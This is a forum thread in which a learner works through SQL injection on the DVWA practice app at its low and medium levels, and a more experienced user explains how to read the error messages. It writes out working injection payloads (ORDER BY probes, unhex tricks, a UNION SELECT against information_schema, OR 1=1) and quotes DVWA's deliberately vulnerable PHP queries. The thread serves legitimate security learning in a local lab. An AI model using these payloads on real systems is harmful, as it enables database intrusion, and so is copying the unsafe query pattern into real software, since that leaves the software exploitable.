DVWA SQL Injection Medium Security Level: Attempt to solve with unhex(27) function failed

[w01f]

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

You can get it here and set it up on your personal lab http://www.dvwa.co.uk/

As usual, ' is used to test for SQLi vulnerabilities

DVWA Low Level Security

Quote

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

DVWA Medium Level Security

Quote

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Both are vulnerable to SQLi, but error message from these 2 levels are different

Quote

 

Low : '''''

Medium : '\''

 

So, I tried it with

Quote

' ORDER BY 10 -- -

and it works for Low level

Quote

Unknown column '10' in 'order clause'

But not on Medium level

Quote

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY 10 -- -' at line 1

I notice that everytime ' is used on Medium level, it will be escaped with \

Then, I decided to use different trick to bypass this which is %27.

27 is a single quote ' value in hex.

Quote

' ORDER BY 10 -- -

' is replaced with %27 so it becomes

Quote

%27 ORDER BY 10 -- -

Unfortunately, this trick won't work on Low Level (no error at all), and here is the error on Medium level.

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27 ORDER BY 10 -- -' at line 1

Since this is GET request, so the request can be seen on address bar.

Quote

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=%2527+ORDER+BY+10+--+-&Submit=Submit#

Interesting, %27 has been encoded by the browser again so it becomes %2527.

25 is a hex value for %

So this won't work.

I've no idea at the moment, so I googled more and found trick to use unhex() function.

Quote

unhex(27) ORDER BY 10 -- -

With this, I was able to use ORDER BY function. But this only work on Medium, not Low level

Quote

Unknown column '10' in 'order clause'

I thought the problem was solved.

But when I try to use it with different SQL syntax such as table_schema='dvwa', I'm getting the same error which is expected.

Quote

unhex(27) UNION SELECT GROUP_CONCAT(table_name),2 FROM information_schema.tables WHERE table_schema='dvwa'-- -

Error

Quote

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'dvwa\'-- -' at line 1

Since unhex() trick worked before, I thought it was working on this too.

Quote

unhex(27) UNION SELECT GROUP_CONCAT(table_name),2 FROM information_schema.tables WHERE table_schema=unhex(27)dvwaunhex(27)-- -

Error

Quote

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'dvwaunhex(27)-- -' at line 1

Little that I know .... I need to seperate the second unhex(27) function with database name which is dvwa.

Else, SQL will read it as "dvwaunhex(27)-- -"

I'm stuck here. How do I solve this problem?

[digininja]

You are massively over complicating things. Go back to basics, you can dump all the users with a simple or statement.

[w01f]

Thanks for your response. Btw, this problem has been solved by try and error. Tick is not even required in Medium level.

I was wondering how to determine if tick is needed or not in the injection?

Initially, I thought it was required for string, and not for integer based on this presentation in Def Con (refer to slide 23).

https://defcon.org/images/defcon-17/dc-17-presentations/defcon-17-joseph_mccray-adv_sql_injection.pdf

Apparently DVWA shows that it's not accurate to determine if tick is required based on integer/string based Injection.

Without tick 

1 ORDER BY 10 -- -

Low

ID: 1 ORDER BY 10 -- -
First name: admin
Surname: admin

Medium

Unknown column '10' in 'order clause'

With tick 

1' ORDER BY 10 -- -

Low

Unknown column '10' in 'order clause'

Medium

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY 10 -- -' at line 1

 

[digininja]

4 hours ago, w01f said:

Initially, I thought it was required for string, and not for integer based on this presentation in Def Con (refer to slide 23).

It is exactly that. The statement you are injecting into ends with something like

WHERE ID=<your value>

So when you put a quote you break the statement and get a syntax error, similarly when you add the ORDER BY you get an error, but that one is a database error telling you you are referencing a column which doesn't exist.

Both are errors, but both generated from different areas of the system. What you need to practice is understanding what is causing the reply you are seeing and then use the error to visualise the statement being used.

The last error is telling you to things, that adding the quote makes the statement syntactically incorrect and also, if you read it carefully, that the quote has been escaped in some way which is why it reports it with the leading \.

 

 

[w01f]

46 minutes ago, digininja said:

what is causing the reply you are seeing and then use the error to visualize the statement being used.

I really appreciate your invaluable response and feedback. Learned a lot just by reading the tips given.

I notice that every time ' is used in medium level, it has been escaped with \

Code

'

Error

... near '\'' at line 1

Code

' OR 1=1 -- -

Error

... near '\' OR 1=1 -- -' at line 1

' OR '1'='1' -- -

Error

... near '\' OR \'1\'=\'1\' -- -' at line 1

I've looked at the source found and found that this was caused by PHP function which is "mysql_real_escape_string" in attempt to mitigate SQLi.

Medium level code: protected by "mysql_real_escape_string"

$id = $_GET['id'];
$id = mysql_real_escape_string($id); $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";

While in low level, there is no protection at all. So, it's easy to break the query, manipulate it, and disable rest of the query with comment.

$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

First question has been answered, I've more. I'll be back for more question :)

So I guess for this kind of environment, I've to tested more and observe the error message clearly as every singe error tells different story.

The important part is to "use the error to visualize the statement being used".

Thanks again for the invaluable tips.

[digininja]

Reading and then understanding error messages is a massive part of testing and one that a lot of beginners for some reason tend to ignore. We get so many issues raised in the DVWA GitHub tracker about not being able to connect to the database.

You ask for a screenshot showing a successful login on the command line and most send back a failed login screenshot and say "there you go, it works" when there is an obvious "login failed" message.

Keep trying, keep learning, it never really gets easier, rarely less frustrating, and you never get "there", wherever that is, but I think it is worth the effort.